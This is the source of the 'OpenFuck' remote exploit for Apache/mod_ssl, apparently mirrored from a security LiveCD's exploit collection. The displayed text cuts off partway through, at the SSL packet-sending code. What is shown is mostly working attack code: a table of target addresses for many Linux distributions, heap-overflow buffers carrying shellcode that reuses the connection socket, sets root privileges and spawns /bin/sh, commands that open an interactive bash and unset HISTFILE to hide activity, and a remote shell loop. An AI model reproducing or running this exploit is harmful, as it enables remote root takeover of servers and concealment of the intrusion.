home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / linux-apachessl-OpenFuck.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  33KB  |  1,340 lines

  1. /*
  2.  * VERY PRIV8 spabam SPAX@zone-h.org
  3.  * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
  4.  * objdump -R /usr/sbin/httpd|grep free to get more targets
  5.  * #hackarena irc.brasnet.org
  6.  */
  7.  
  8. #include <arpa/inet.h>
  9. #include <netinet/in.h>
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netdb.h>
  13. #include <errno.h>
  14. #include <string.h>
  15. #include <stdio.h>
  16. #include <unistd.h>
  17.  
  18. #include <openssl/ssl.h>
  19. #include <openssl/rsa.h>
  20. #include <openssl/x509.h>
  21. #include <openssl/evp.h>
  22.  
  23. /* update this if you add architectures */
  24. #define MAX_ARCH 105
  25.  
  26. struct archs {
  27.     char* desc;
  28.     int func_addr;    /* objdump -R /usr/sbin/httpd | grep free */
  29. } architectures[] = {
  30.  
  31.         {
  32.                 "Caldera OpenLinux (apache-1.3.26)",
  33.                 0x080920e0
  34.         },
  35.     {
  36.         "Cobalt Sun 6.0 (apache-1.3.12)",
  37.         0x8120f0c
  38.     },
  39.     {
  40.         "Cobalt Sun 6.0 (apache-1.3.20)",
  41.         0x811dcb8
  42.     },
  43.     {
  44.         "Cobalt Sun x (apache-1.3.26)",
  45.         0x8123ac3
  46.     },
  47.     {
  48.         "Cobalt Sun x Fixed2 (apache-1.3.26)",
  49.         0x81233c3
  50.     },
  51.     {
  52.         "Conectiva 4 (apache-1.3.6)",
  53.         0x08075398
  54.     },
  55.     {
  56.         "Conectiva 4.1 (apache-1.3.9)",
  57.         0x0808f2fe
  58.     },
  59.     {
  60.         "Conectiva 6 (apache-1.3.14)",
  61.         0x0809222c
  62.     },
  63.     {
  64.         "Conectiva 7 (apache-1.3.12)",
  65.         0x0808f874
  66.     },
  67.     {
  68.         "Conectiva 7 (apache-1.3.19)",
  69.         0x08088aa0
  70.     },
  71.     {
  72.         "Conectiva 7/8 (apache-1.3.26)",
  73.         0x0808e628
  74.     },
  75.     {
  76.         "Conectiva 8 (apache-1.3.22)",
  77.         0x0808b2d0
  78.     },
  79.     {
  80.         "Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
  81.         0x08095264
  82.     },
  83.     {
  84.         "Debian GNU Linux (apache_1.3.19-1)",
  85.         0x080966fc
  86.     },
  87.     {
  88.         "Debian GNU Linux (apache_1.3.22-2)",
  89.         0x08096aac
  90.     },
  91.     {
  92.         "Debian GNU Linux (apache-1.3.22-2.1)",
  93.         0x08083828
  94.     },
  95.     {
  96.         "Debian GNU Linux (apache-1.3.22-5)",
  97.         0x08083728
  98.     },
  99.     {
  100.         "Debian GNU Linux (apache_1.3.23-1)",
  101.         0x08085de8
  102.     },
  103.     {
  104.         "Debian GNU Linux (apache_1.3.24-2.1)",
  105.         0x08087d08
  106.     },
  107.         {       "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
  108.             0x080873ac
  109.     },
  110.     {
  111.         "Debian GNU Linux (apache_1.3.24-3)",
  112.         0x08087d68
  113.     },
  114.     {
  115.         "Debian GNU Linux (apache-1.3.26-1)",
  116.         0x0080863c4
  117.     },
  118.     {
  119.         "Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
  120.         0x080863cc
  121.     },
  122.     {       "Debian GNU Linux (apache-1.3.27)",
  123.             0x0080866a3
  124.     },
  125.     
  126.     /* Try to add this targets for BSD dear kiddy ;P
  127.  
  128. { "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
  129. { "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
  130. { "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
  131. { "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
  132. { "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
  133. { "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
  134. { "FreeBSD (apache-1.3.12)", 0x0809bd7c },
  135. { "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
  136. { "FreeBSD (apache-1.3.14)", 0x080ab68c },
  137. { "FreeBSD (apache-1.3.14)", 0x0808c76c },
  138. { "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
  139. { "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
  140. { "FreeBSD (apache-1.3.17_1)", 0x0808820c },
  141. { "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
  142. { "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
  143. { "FreeBSD (apache-1.3.20)", 0x0808cb70 },
  144. { "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
  145. { "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
  146. { "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
  147. { "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
  148. { "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
  149. { "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
  150. { "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
  151. { "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
  152. { "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
  153. { "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
  154. { "FreeBSD (apache-1.3.27)", 0x080902e4 },
  155. */
  156.     
  157.  
  158.     {
  159.         "Gentoo Linux (apache-1.3.24-r2)",
  160.         0x08086c34
  161.     },
  162.     {
  163.         "Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
  164.         0x080808ab
  165.     },
  166.     {
  167.         "Mandrake Linux 7.1 (apache-1.3.14-2)",
  168.         0x0809f6c4
  169.     },
  170.     {
  171.         "Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
  172.         0x0809d233
  173.     },
  174.     {
  175.         "Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
  176.         0x0809f6ef
  177.     },
  178.     {
  179.         "Mandrake Linux 7.2 (apache-1.3.14) 2",
  180.         0x0809d6c4
  181.     },
  182.     {
  183.         "Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
  184.         0x0809ccde
  185.     },
  186.     {
  187.         "Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
  188.         0x0809ce14
  189.     },
  190.     {
  191.         "Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
  192.         0x0809d262
  193.     },
  194.     {
  195.         "Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
  196.         0x08083545
  197.     },
  198.     {
  199.         "Mandrake Linux 8.0 (apache-1.3.19-3)",
  200.         0x0809ea98
  201.     },
  202.     {
  203.         "Mandrake Linux 8.1 (apache-1.3.20-3)",
  204.         0x0809e97c
  205.     },
  206.     {
  207.         "Mandrake Linux 8.2 (apache-1.3.23-4)",
  208.         0x08086580
  209.     },
  210.     {       "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
  211.             0x08086484
  212.     },
  213.     {       "Mandrake Linux 8.2 (apache-1.3.24)",
  214.             0x08086665
  215.     },
  216.     
  217.     {       "Mandrake Linux 9 (apache-1.3.26)",
  218.             0x0808b864
  219.     },
  220.     {
  221.         "RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
  222.         0x0808c0f4
  223.     },
  224.     {
  225.         "RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
  226.         0x080d2c35
  227.     },
  228.     {
  229.         "RedHat Linux 4.2 (apache-1.1.3-3)",
  230.         0x08065bae
  231.     },
  232.     {
  233.         "RedHat Linux 5.0 (apache-1.2.4-4)",
  234.         0x0808c82c
  235.     },
  236.     {
  237.         "RedHat Linux 5.1-Update (apache-1.2.6)",
  238.         0x08092a45
  239.     },
  240.     {
  241.         "RedHat Linux 5.1 (apache-1.2.6-4)",
  242.         0x08092c2d
  243.     },
  244.     {
  245.         "RedHat Linux 5.2 (apache-1.3.3-1)",
  246.         0x0806f049
  247.     },
  248.     {
  249.         "RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
  250.         0x0808e4d8
  251.     },
  252.     {
  253.         "RedHat Linux 6.0 (apache-1.3.6-7)",
  254.         0x080707ec
  255.     },
  256.     {
  257.         "RedHat Linux 6.0 (apache-1.3.6-7)",
  258.         0x080707f9
  259.     },
  260.     {
  261.         "RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
  262.         0x0808fd52
  263.     },
  264.     {
  265.         "RedHat Linux 6.0 Update (apache-1.3.24)",
  266.         0x80acd58
  267.     },
  268.     {
  269.         "RedHat Linux 6.1 (apache-1.3.9-4)1",
  270.         0x0808ccc4
  271.     },
  272.     {
  273.         "RedHat Linux 6.1 (apache-1.3.9-4)2",
  274.         0x0808ccdc
  275.     },
  276.     {
  277.         "RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
  278.         0x0808fd5d
  279.     },
  280.     {
  281.         "RedHat Linux 6.1-fp2000 (apache-1.3.26)",
  282.         0x082e6fcd
  283.     },
  284.     {
  285.         "RedHat Linux 6.2 (apache-1.3.12-2)1",
  286.         0x0808f689
  287.     },
  288.     {
  289.         "RedHat Linux 6.2 (apache-1.3.12-2)2",
  290.         0x0808f614
  291.     },
  292.     {
  293.         "RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
  294.         0x0808f9ec
  295.     },
  296.     {
  297.         "RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
  298.         0x0808f9d4
  299.     },
  300.     {
  301.         "Redhat Linux 7.x (apache-1.3.22)",
  302.         0x0808400c
  303.     },
  304.     {
  305.         "RedHat Linux 7.x (apache-1.3.26-1)",
  306.         0x080873bc
  307.     },
  308.     {       "RedHat Linux 7.x (apache-1.3.27)",
  309.             0x08087221
  310.     },
  311.     {
  312.         "RedHat Linux 7.0 (apache-1.3.12-25)1",
  313.         0x0809251c
  314.     },
  315.     {
  316.         "RedHat Linux 7.0 (apache-1.3.12-25)2",
  317.         0x0809252d
  318.     },
  319.     {
  320.         "RedHat Linux 7.0 (apache-1.3.14-2)",
  321.         0x08092b98
  322.     },
  323.         {
  324.         "RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
  325.         0x08084358
  326.     },
  327.     {
  328.         "RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
  329.         0x0808438c
  330.     },
  331.     {
  332.         "RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
  333.         0x08086e41
  334.     },
  335.     {
  336.         "RedHat Linux 7.1 (apache-1.3.19-5)1",
  337.         0x0809af8c
  338.     },
  339.     {
  340.         "RedHat Linux 7.1 (apache-1.3.19-5)2",
  341.         0x0809afd9
  342.     },
  343.     {
  344.         "RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
  345.         0x0808438c
  346.     },
  347.     {
  348.         "RedHat Linux 7.1-Update (1.3.22-5.7.1)",
  349.         0x08084389
  350.     },
  351.         {
  352.         "RedHat Linux 7.1 (apache-1.3.22-src)",
  353.             0x0816021c
  354.         },
  355.         {
  356.         "RedHat Linux 7.1-Update (1.3.27-1.7.1)",
  357.         0x08086ec89
  358.     },
  359.     {
  360.         "RedHat Linux 7.2 (apache-1.3.20-16)1",
  361.         0x080994e5
  362.     },
  363.     {
  364.         "RedHat Linux 7.2 (apache-1.3.20-16)2",
  365.         0x080994d4
  366.     },
  367.     {
  368.         "RedHat Linux 7.2-Update (apache-1.3.22-6)",
  369.         0x08084045
  370.     },
  371.     {
  372.         "RedHat Linux 7.2 (apache-1.3.24)",
  373.         0x80b0938
  374.     },
  375.     {
  376.         "RedHat Linux 7.2 (apache-1.3.26)",
  377.         0x08161c16
  378.     },
  379.     {
  380.         "RedHat Linux 7.2 (apache-1.3.26-snc)",
  381.         0x8161c14
  382.     },
  383.     {
  384.  
  385.         "Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
  386.         0x08269950
  387.     },
  388.     {
  389.         "Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
  390.         0x08269988
  391.     },
  392.     {
  393.         "RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
  394.         0x08086af9
  395.     },
  396.     {
  397.         "RedHat Linux 7.3 (apache-1.3.23-11)1",
  398.         0x0808528c
  399.     },
  400.     {
  401.         "RedHat Linux 7.3 (apache-1.3.23-11)2",
  402.         0x0808525f
  403.     },
  404.     {       "RedHat Linux 8.0 (apache-1.3.27)",
  405.             0x08084c1c
  406.         },
  407.         {       "RedHat Linux 8.0-second (apache-1.3.27)",
  408.                 0x0808151e
  409.         },
  410.     {
  411.         "Slackware Linux 4.0 (apache-1.3.6)",
  412.         0x08088130
  413.     },
  414.     {
  415.         "Slackware Linux 7.0 (apache-1.3.9)",
  416.         0x080a7fc0
  417.     },
  418.     {
  419.         "Slackware Linux 7.0 (apache-1.3.26)",
  420.         0x083d37fc
  421.     },
  422.         {       "Slackware 7.0  (apache-1.3.26)2",
  423.         0x083d2232
  424.     },
  425.     {
  426.         "Slackware Linux 7.1 (apache-1.3.12)",
  427.         0x080a86a4
  428.     },
  429.     {
  430.         "Slackware Linux 8.0 (apache-1.3.20)",
  431.         0x080ae67c
  432.     },
  433.     {
  434.         "Slackware Linux 8.1 (apache-1.3.24)",
  435.         0x080b0c60
  436.     },
  437.     {
  438.         "Slackware Linux 8.1 (apache-1.3.26)",
  439.         0x080b2100
  440.     },
  441.  
  442.     {
  443.         "Slackware Linux 8.1-stable (apache-1.3.26)",
  444.         0x080b0c60
  445.     },
  446.     {       "Slackware Linux (apache-1.3.27)",
  447.             0x080b1a3a
  448.     },
  449.     {
  450.         "SuSE Linux 7.0 (apache-1.3.12)",
  451.         0x0809f54c
  452.     },
  453.     {
  454.         "SuSE Linux 7.1 (apache-1.3.17)",
  455.         0x08099984
  456.     },
  457.     {
  458.         "SuSE Linux 7.2 (apache-1.3.19)",
  459.         0x08099ec8
  460.     },
  461.     {
  462.         "SuSE Linux 7.3 (apache-1.3.20)",
  463.         0x08099da8
  464.     },
  465.     {
  466.         "SuSE Linux 8.0 (apache-1.3.23)",
  467.         0x08086168
  468.     },
  469.     {
  470.         "SUSE Linux 8.0 (apache-1.3.23-120)",
  471.         0x080861c8
  472.     },
  473.     {
  474.         "SuSE Linux 8.0 (apache-1.3.23-137)",
  475.         0x080861c8
  476.     },
  477. /* this one unchecked cause require differend shellcode */
  478.     {
  479.         "Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
  480.         0xfd42630
  481.     },
  482.  
  483. };
  484.  
  485. extern int errno;
  486.  
  487. int cipher;
  488. int ciphers;
  489.  
  490. /* the offset of the local port from be beginning of the overwrite next chunk buffer */
  491. #define FINDSCKPORTOFS     208 + 12 + 46
  492.  
  493. unsigned char overwrite_session_id_length[] =
  494.     "AAAA"                                /* int master key length; */
  495.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char master key[SSL MAX MASTER KEY LENGTH];    */
  496.     "\x70\x00\x00\x00";                    /* unsigned int session id length; */
  497.  
  498. unsigned char overwrite_next_chunk[] =
  499.     "AAAA"                                /* int master key length; */
  500.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char master key[SSL MAX MASTER KEY LENGTH];    */
  501.     "AAAA"                                /* unsigned int session id length; */
  502.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
  503.     "AAAA"                                /* unsigned int sid ctx length; */
  504.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
  505.     "AAAA"                                /* int not resumable; */
  506.     "\x00\x00\x00\x00"                    /* struct sess cert st *sess cert; */
  507.     "\x00\x00\x00\x00"                    /* X509 *peer; */
  508.     "AAAA"                                /* long verify result; */
  509.     "\x01\x00\x00\x00"                    /* int references; */
  510.     "AAAA"                                /* int timeout; */
  511.     "AAAA"                                /* int time */
  512.     "AAAA"                                /* int compress meth; */
  513.     "\x00\x00\x00\x00"                    /* SSL CIPHER *cipher; */
  514.     "AAAA"                                /* unsigned long cipher id; */
  515.     "\x00\x00\x00\x00"                    /* STACK OF(SSL CIPHER) *ciphers; */
  516.     "\x00\x00\x00\x00\x00\x00\x00\x00"    /* CRYPTO EX DATA ex data; */
  517.     "AAAAAAAA"                            /* struct ssl session st *prev,*next; */
  518.  
  519.     "\x00\x00\x00\x00"                    /* Size of previous chunk */
  520.     "\x11\x00\x00\x00"                    /* Size of chunk, in bytes */
  521.     "fdfd"                                /* Forward and back pointers */
  522.     "bkbk"
  523.     "\x10\x00\x00\x00"                    /* Size of previous chunk */
  524.     "\x10\x00\x00\x00"                    /* Size of chunk, PREV INUSE is set */
  525.  
  526. /* shellcode start */
  527.     "\xeb\x0a\x90\x90"    /* jump 10 bytes ahead, land at shellcode */
  528.     "\x90\x90\x90\x90"
  529.     "\x90\x90\x90\x90"    /* this is overwritten with FD by the unlink macro */
  530.  
  531. /* 72 bytes findsckcode by LSD-pl */
  532.     "\x31\xdb"             /* xorl    %ebx,%ebx              */
  533.     "\x89\xe7"             /* movl    %esp,%edi              */
  534.     "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
  535.     "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
  536.     "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
  537.     "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
  538.     "\xb3\x10"             /* movb    $0x10,%bl              */
  539.     "\x89\x19"             /* movl    %ebx,(%ecx)            */
  540.     "\x31\xc9"             /* xorl    %ecx,%ecx              */
  541.     "\xb1\xff"             /* movb    $0xff,%cl              */
  542.     "\x89\x0f"             /* movl    %ecx,(%edi)            */
  543.     "\x51"                 /* pushl   %ecx                   */
  544.     "\x31\xc0"             /* xorl    %eax,%eax              */
  545.     "\xb0\x66"             /* movb    $0x66,%al              */
  546.     "\xb3\x07"             /* movb    $0x07,%bl              */
  547.     "\x89\xf9"             /* movl    %edi,%ecx              */
  548.     "\xcd\x80"             /* int     $0x80                  */
  549.     "\x59"                 /* popl    %ecx                   */
  550.     "\x31\xdb"             /* xorl    %ebx,%ebx              */
  551.     "\x39\xd8"             /* cmpl    %ebx,%eax              */
  552.     "\x75\x0a"             /* jne     <findsckcode+54>       */
  553.     "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx            */
  554.     "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)          */
  555.     "\x74\x02"             /* je      <findsckcode+56>       */
  556.     "\xe2\xe0"             /* loop    <findsckcode+24>       */
  557.     "\x89\xcb"             /* movl    %ecx,%ebx              */
  558.     "\x31\xc9"             /* xorl    %ecx,%ecx              */
  559.     "\xb1\x03"             /* movb    $0x03,%cl              */
  560.     "\x31\xc0"             /* xorl    %eax,%eax              */
  561.     "\xb0\x3f"             /* movb    $0x3f,%al              */
  562.     "\x49"                 /* decl    %ecx                   */
  563.     "\xcd\x80"             /* int     $0x80                  */
  564.     "\x41"                 /* incl    %ecx                   */
  565.     "\xe2\xf6"             /* loop    <findsckcode+62>       */
  566.  
  567. /* 10 byte setresuid(0,0,0); by core */
  568.      "\x31\xc9"       /* xor    %ecx,%ecx */
  569.      "\xf7\xe1"       /* mul    %ecx,%eax */
  570.      "\x51"           /* push   %ecx */
  571.      "\x5b"           /* pop    %ebx */
  572.      "\xb0\xa4"       /* mov    $0xa4,%al */
  573.      "\xcd\x80"       /* int    $0x80 */
  574.  
  575.     
  576. /* bigger shellcode added by spabam */
  577.  
  578. /* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
  579.         "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
  580. */
  581.  
  582.  
  583. /* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
  584.     "\x31\xc0"             /* xorl    %eax,%eax              */
  585.     "\x50"                 /* pushl   %eax                   */
  586.     "\x68""//sh"           /* pushl   $0x68732f2f            */
  587.     "\x68""/bin"           /* pushl   $0x6e69622f            */
  588.     "\x89\xe3"             /* movl    %esp,%ebx              */
  589.     "\x50"                 /* pushl   %eax                   */
  590.     "\x53"                 /* pushl   %ebx                   */
  591.     "\x89\xe1"             /* movl    %esp,%ecx              */
  592.     "\x99"                 /* cdql                           */
  593.     "\xb0\x0b"             /* movb    $0x0b,%al              */
  594.     "\xcd\x80";             /* int     $0x80                  */
  595.  
  596. /* read and write buffer*/
  597. #define BUFSIZE 16384
  598.  
  599. /* hardcoded protocol stuff */
  600. #define CHALLENGE_LENGTH 16
  601. #define RC4_KEY_LENGTH 16    /* 128 bits */
  602. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
  603.  
  604. /* straight from the openssl source */
  605. #define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))    )),c+=2)
  606. #define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
  607.  
  608. /* we keep all SSL2 state in this structure */
  609. typedef struct {
  610.     int sock;
  611.  
  612.     /* client stuff */
  613.     unsigned char challenge[CHALLENGE_LENGTH];
  614.     unsigned char master_key[RC4_KEY_LENGTH];
  615.     unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
  616.  
  617.     /* connection id - returned by the server */
  618.     int conn_id_length;
  619.     unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
  620.  
  621.     /* server certificate */
  622.     X509 *x509;
  623.  
  624.     /* session keys */
  625.     unsigned char* read_key;
  626.     unsigned char* write_key;
  627.     RC4_KEY* rc4_read_key;
  628.     RC4_KEY* rc4_write_key;
  629.  
  630.     /* sequence numbers, used for MAC calculation */
  631.     int read_seq;
  632.     int write_seq;
  633.  
  634.     /* set to 1 when the SSL2 handshake is complete */
  635.     int encrypted;
  636. } ssl_conn;
  637.  
  638. #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
  639. #define COMMAND2 "unset HISTFILE; uname -a; id; echo SPABAM R0X; pwd; w;\n"
  640.  
  641. long getip(char *hostname) {
  642.     struct hostent *he;
  643.     long ipaddr;
  644.     
  645.     if ((ipaddr = inet_addr(hostname)) < 0) {
  646.         if ((he = gethostbyname(hostname)) == NULL) {
  647.             perror("gethostbyname()");
  648.             exit(-1);
  649.         }
  650.         memcpy(&ipaddr, he->h_addr, he->h_length);
  651.     }    
  652.     return ipaddr;
  653. }
  654.  
  655. /* mixter's code w/enhancements by core */
  656.  
  657. int sh(int sockfd) {
  658.    char snd[1024], rcv[1024];
  659.    fd_set rset;
  660.    int maxfd, n;
  661.  
  662.    /* Priming commands */
  663.    strcpy(snd, COMMAND1 "\n");
  664.    write(sockfd, snd, strlen(snd));
  665.  
  666.    strcpy(snd, COMMAND2 "\n");
  667.    write(sockfd, snd, strlen(snd));
  668.  
  669.    /* Main command loop */
  670.    for (;;) {
  671.       FD_SET(fileno(stdin), &rset);
  672.       FD_SET(sockfd, &rset);
  673.  
  674.       maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
  675.       select(maxfd, &rset, NULL, NULL, NULL);
  676.  
  677.       if (FD_ISSET(fileno(stdin), &rset)) {
  678.      bzero(snd, sizeof(snd));
  679.      fgets(snd, sizeof(snd)-2, stdin);
  680.      write(sockfd, snd, strlen(snd));
  681.       }
  682.  
  683.       if (FD_ISSET(sockfd, &rset)) {
  684.      bzero(rcv, sizeof(rcv));
  685.  
  686.      if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
  687.         printf("Good Bye!\n");
  688.         return 0;
  689.      }
  690.  
  691.      if (n < 0) {
  692.         perror("read");
  693.         return 1;
  694.      }
  695.  
  696.      fputs(rcv, stdout);
  697.      fflush(stdout); /* keeps output nice */
  698.       }
  699.    } /* for(;;) */
  700. }
  701.  
  702. /* Returns the local port of a connected socket */
  703. int get_local_port(int sock)
  704. {
  705.     struct sockaddr_in s_in;
  706.     unsigned int namelen = sizeof(s_in);
  707.  
  708.     if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
  709.         printf("Can't get local port: %s\n", strerror(errno));
  710.         exit(1);
  711.     }
  712.  
  713.     return s_in.sin_port;
  714. }
  715.  
  716. /* Connect to a host */
  717. int connect_host(char* host, int port)
  718. {
  719.     struct sockaddr_in s_in;
  720.     int sock;
  721.  
  722.     s_in.sin_family = AF_INET;
  723.     s_in.sin_addr.s_addr = getip(host);
  724.     s_in.sin_port = htons(port);
  725.  
  726.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
  727.         printf("Could not create a socket\n");
  728.         exit(1);
  729.     }
  730.  
  731.     if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
  732.         printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
  733.         exit(1);
  734.     }
  735.  
  736.     return sock;
  737. }
  738.  
  739. /* Create a new ssl conn structure and connect to a host */
  740. ssl_conn* ssl_connect_host(char* host, int port)
  741. {
  742.     ssl_conn* ssl;
  743.  
  744.     if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
  745.         printf("Can't allocate memory\n");
  746.         exit(1);
  747.     }
  748.  
  749.     /* Initialize some values */
  750.     ssl->encrypted = 0;
  751.     ssl->write_seq = 0;
  752.     ssl->read_seq = 0;
  753.  
  754.     ssl->sock = connect_host(host, port);
  755.  
  756.     return ssl;
  757. }
  758.  
  759. /* global buffer used by the ssl result() */
  760. char res_buf[30];
  761.  
  762. /* converts an SSL error code to a string */
  763. char* ssl_error(int code) {
  764.     switch (code) {
  765.         case 0x00:    return "SSL2 PE UNDEFINED ERROR (0x00)";
  766.         case 0x01:    return "SSL2 PE NO CIPHER (0x01)";
  767.         case 0x02:    return "SSL2 PE NO CERTIFICATE (0x02)";
  768.         case 0x04:    return "SSL2 PE BAD CERTIFICATE (0x03)";
  769.         case 0x06:    return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
  770.     default:
  771.         sprintf(res_buf, "%02x", code);
  772.         return res_buf;
  773.     }
  774. }
  775.  
  776. /* read len bytes from a socket. boring. */
  777. int read_data(int sock, unsigned char* buf, int len)
  778. {
  779.     int l;
  780.     int to_read = len;
  781.  
  782.     do {
  783.         if ((l = read(sock, buf, to_read)) < 0) {
  784.             printf("Error in read: %s\n", strerror(errno));
  785.             exit(1);
  786.         }
  787.         to_read -= len;
  788.     } while (to_read > 0);
  789.  
  790.     return len;
  791. }
  792.  
  793. /* reads an SSL packet and decrypts it if necessery */
  794. int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
  795. {
  796.     int rec_len, padding;
  797.  
  798.     read_data(ssl->sock, buf, 2);
  799.  
  800.     if ((buf[0] & 0x80) == 0) {
  801.         /* three byte header */
  802.         rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
  803.         read_data(ssl->sock, &buf[2], 1);
  804.         padding = (int)buf[2];
  805.     }
  806.     else {
  807.         /* two byte header */
  808.         rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
  809.         padding = 0;
  810.     }
  811.  
  812.     if ((rec_len <= 0) || (rec_len > buf_size)) {
  813.         printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); 
  814.         exit(1);
  815.     }
  816.  
  817.     read_data(ssl->sock, buf, rec_len);
  818.  
  819.     if (ssl->encrypted) {
  820.         if (MD5_DIGEST_LENGTH + padding >= rec_len) {
  821.             if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
  822.                 /* the server didn't switch to encryption due to an error */
  823.                 return 0;
  824.             }
  825.             else {
  826.                 printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
  827.                 exit(1);
  828.             }
  829.         }
  830.  
  831.         /* decrypt the encrypted part of the packet */
  832.         RC4(ssl->rc4_read_key, rec_len, buf, buf);
  833.  
  834.         /* move the decrypted message in the beginning of the buffer */
  835.         rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
  836.         memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
  837.     }
  838.  
  839.     if (buf[0] == SSL2_MT_ERROR) {
  840.         if (rec_len != 3) {
  841.             printf("Malformed server error message\n");
  842.             exit(1);
  843.         }
  844.         else {
  845.             return 0;
  846.         }
  847.     }
  848.  
  849.     return rec_len;
  850. }
  851.  
  852. /* send an ssl packet, encrypting it if ssl->encrypted is set */
  853. void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
  854. {
  855.     unsigned char buf[BUFSIZE];
  856.     unsigned char* p;
  857.     int tot_len;
  858.     MD5_CTX ctx;
  859.     int seq;
  860.  
  861.  
  862.     if (ssl->encrypted)
  863.         tot_len = rec_len + MD5_DIGEST_LENGTH;    /* RC4 needs no padding */
  864.     else
  865.         tot_len = rec_len;
  866.  
  867.     if (2 + tot_len > BUFSIZE) {
  868.         printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
  869.         exit(1);
  870.     }
  871.  
  872.     p = buf;
  873.     s2n(tot_len, p);
  874.  
  875.     buf[0] = buf[0] | 0x80;    /* two byte header */
  876.  
  877.     if (ssl->encrypted) {
  878.         /* calculate the MAC */
